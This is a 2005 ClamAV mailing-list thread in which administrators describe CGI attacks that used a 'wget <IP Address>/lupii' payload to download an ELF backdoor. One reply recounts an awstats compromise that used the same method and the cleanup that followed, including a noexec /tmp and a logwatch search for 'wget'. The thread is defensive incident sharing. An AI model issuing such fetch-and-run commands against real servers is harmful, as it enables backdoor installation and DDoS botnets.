On Saturday 05 Nov 2005 14:42, [EMAIL PROTECTED] wrote: > Hi again everyone, > > Got the same thing few minutes ago, coming from China this time, pointing > to the same address for the download .... Seems to be spreading ? The > downloaded file is definitely for Linux.
I got caught out by a vulnerability in awstats a few months back, used the same kind of method, put an executable in /tmp and ran it (somehow). It was being used to run a ddos attack, controlled by irc. Once I found it I removed it from /tmp and set the /tmp partition to noexec, upgraded awstats and added a search for 'wget' to my logwatch. Phew! > > Tudor > > __________________ > > Hi everyone, > > Last night I caught an attack to my web servers here, the attack consisted > in command execution attempts using various CGI vulnerabilities. The fact > is that after looking at the payload of all connection attempts, they all > had a "wget <IP Address>/lupii", same IP address, I can send it to the > list if anybody needs it. I downloaded the file from that site, it is an > elf executable and it seems to be a backdoor of some sort reporting back > to the site. The attack was coming from Taiwan and the download site was > in Norway. > > I am not good at looking at elf format programs, is anybody willing to > take a look ? I can send the file on demand. Does anybody know what is > this all about ? > > Thanks, > Tudor > > _______________________________________________ > http://lurker.clamav.net/list/clamav-users.html -- ----------------- Bob Hutchinson Midwales dot com ----------------- _______________________________________________ http://lurker.clamav.net/list/clamav-users.html
